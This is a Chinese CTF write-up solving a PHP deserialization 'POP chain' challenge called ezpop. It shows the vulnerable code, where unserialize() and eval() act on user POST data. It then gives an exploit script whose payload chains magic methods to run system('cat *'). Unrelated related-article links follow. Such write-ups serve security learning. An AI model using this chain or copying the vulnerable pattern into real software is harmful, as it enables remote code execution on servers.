复现一道dactf的ezpop

<?php

class crow

{

    public $v1;

    public $v2;

    function eval() {

        echo new $this->v1($this->v2);

    }

    public function __invoke()

    {

        $this->v1->world();

    }

}

class fin

{

    public $f1;

    public function __destruct()

    {

        echo $this->f1 . '114514';

    }

    public function run()

    {

        ($this->f1)();

    }

    public function __call($a, $b)

    {

        echo $this->f1->get_flag();

    }

}

class what

{

    public $a;

    public function __toString()

    {

        $this->a->run();

        return 'hello';

    }

}

class mix

{

    public $m1;

    public function run()

    {

        ($this->m1)();

    }

    public function get_flag()

    {

        eval('#' . $this->m1);

    }

}

if (isset($_POST['cmd'])) {

    unserialize($_POST['cmd']);

} else {

    highlight_file(__FILE__);

}

是一道pop链的题目

我们先理清楚各个魔术函数之间的关系

destruct是起点,然后因为将f1当作字符串拼接所以触发to_string f1是what类对象实例。然后f1里面触发a的run()函数然后应该可以走两条路,我们选择mix类,所以a是mix类实例。然后将m1以函数方式调用很显然触发invoke函数,所以m1是crow类实例。然后调用v1不存在的函数,触发call函数,然后就会执行get_flag函数。但是eval()函数里有注释符所以我们用\n来跳过注释符。下面是我的exp。

<?php

class crow

{

    public $v1;

    public $v2;

    function eval() {

        echo new $this->v1($this->v2);

    }

    public function __invoke()

    {

        $this->v1->world();

    }

}

class fin

{

    public $f1;

    public function __destruct()

    {

        echo $this->f1 . '114514';

    }

    public function run()

    {

        ($this->f1)();

    }

    public function __call($a, $b)

    {

        echo $this->f1->get_flag();

    }

}

class what

{

    public $a;

    public function __toString()

    {

        $this->a->run();

        return 'hello';

    }

}

class mix

{

    public $m1;

    public function run()

    {

        ($this->m1)();

    }

    public function get_flag()

    {

        eval('#' . $this->m1);

    }

}

$fin=new fin();

$fin1=new fin();

$what=new what();

$mix= new mix();

$mix1=new mix();

$crow=new crow();

$fin->f1=$what;

$what->a=$mix;

$mix->m1=$crow;

$crow->v1=$fin1;

$fin1->f1=$mix1;

$mix1->m1="\nsystem('cat *');";

echo urlencode((serialize($fin)));

?>

打开所有文件以后

在源代码中找到flag

(ri)呗hackbar坑惨了 里面的posturl编码自动给我加了个换行符导致死也没做出来,所以还是用bp吧。

2022DASCTF X SU 三月春季挑战赛 ezpop的更多相关文章

  1. 2022DASCTF X SU 三月春季挑战赛 Calc

    查看代码 #coding=utf-8 from flask import Flask,render_template,url_for,render_template_string,redirect,r ...

  2. 2022DASCTF Apr X FATE 防疫挑战赛-- SimpleFlow

    1.SimpleFlow 得到pcapng文件,协议分级统计显示大部分为TCP流和http流 过滤http流,发现了flag.zip,foremost分离,得到加密的zip 在pcapng中寻找pas ...

  3. linux su和sudo命令的区别

    一. 使用 su 命令临时切换用户身份 1.su 的适用条件和威力 su命令就是切换用户的工具,怎么理解呢?比如我们以普通用户beinan登录的,但要添加用户任务,执行useradd ,beinan用 ...

  4. .NET Core 2.0版本预计于2017年春季发布

    英文原文: NET Core 2.0 Planned for Spring 2017 微软项目经理 Immo Landwerth 公布了即将推出的 .NET Core 2.0 版本的细节,该版本预计于 ...

  5. entrar en su zapatilla de deporte en este lugar

    Mientras que yo apareció su campo usando nuestro Nike Glide Wildhorse sólo dos ($ 110) zapatillas de ...

  6. su与su-

    1.Linux中的用户切换:su和su - 的区别 大部分Linux发行版的默认账户是普通用户,而更改系统文件或者执行某些命令,需要root身份才能进行,这就需要从当前用户切换到root用户,Linu ...

  7. su root认证失败的解决方法

    sudo passwd 输入安装密码. 输入新密码. 输入 su 即获得root权限.

  8. su到普通用户不能起图形 解决办法

    环境介绍:       登录系统的时候采用的是root用户,然后su - oracle帐户后,然后执行startx命令启动图形界面之后就报如下的错误,根据提示是PAM起作用了.如下是错误信息:[ora ...

  9. ubuntu su sudo sudo–i 区别

    sudo : 暂时切换到超级用户模式以执行超级用户权限,提示输入密码时该密码为当前用户的密码,而不是超级账户的密码.不过有时间限制,Ubuntu默认为一次时长15分钟. su : 切换到某某用户模式, ...

随机推荐

  1. 矩池云上TensorBoard/TensorBoardX配置说明

    Tensorflow用户使用TensorBoard 矩池云现在为带有Tensorflow的镜像默认开启了6006端口,那么只需要在租用后使用命令启动即可 tensorboard --logdir lo ...

  2. VUE npm run build的项目出现跨域请求的问题npm run dev没有这个问题

    报错信息 Access to XMLHttpRequest at 'http://platformapi-test.lih-elearning.cn/api/v1/login' from origin ...

  3. 将su模型导入arcgis,并获取高度信息,多面体转shp文件(ArcMap)

    问题:将Sketchup中导出的su模型,导入arcgis并得到面shp文件,进而获取各建筑的高度.面积等信息. 思路: (1)导入arcgis得到多面体 (2)转为面shp文件 (3)计算高度/面积 ...

  4. MySQL CREATE TABLE 简单设计模板交流

      推荐用 MySQL 8.0 (2018/4/19 发布, 开发者说同比 5.7 快 2 倍) 或同类型以上版本. CREATE TABLE TEMPLATE CREATE TABLE [table ...

  5. 记录VMware安装VMware Tools过程及遇到的一些问题

    镜像下载.域名解析.时间同步请点击 阿里云开源镜像站 本文以CentOS安装为例 为什么要安装VMware Tools ? 便于在Windows 下更好管理虚拟机 便于设置Windows和CentOS ...

  6. RabbitMQ Go客户端教程6——RPC

    本文翻译自RabbitMQ官网的Go语言客户端系列教程,本文首发于我的个人博客:liwenzhou.com,教程共分为六篇,本文是第六篇--RPC. 这些教程涵盖了使用RabbitMQ创建消息传递应用 ...

  7. CVE-2015-5531(目录遍历漏洞)

    vulhub漏洞环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 启动docker环境 cd vulhub-master/ ...

  8. Mapper 编写有哪几种方式?

    第一种:接口实现类继承 SqlSessionDaoSupport:使用此种方法需要编写 mapper 接口,mapper 接口实现类.mapper.xml 文件. 1.在 sqlMapConfig.x ...

  9. Springmvc入门基础(四) ---参数绑定

    1.默认支持的参数类型 处理器形参中添加如下类型的参数处理适配器会默认识别并进行赋值. 除了ModelAndView以外,还可以使用Model来向页面传递数据, Model是一个接口,在参数里直接声明 ...

  10. JDBC 中如何进行事务处理?

    Connection 提供了事务处理的方法,通过调用 setAutoCommit(false)可以设置 手动提交事务:当事务完成后用 commit()显式提交事务:如果在事务处理过程中 发生异常则通过 ...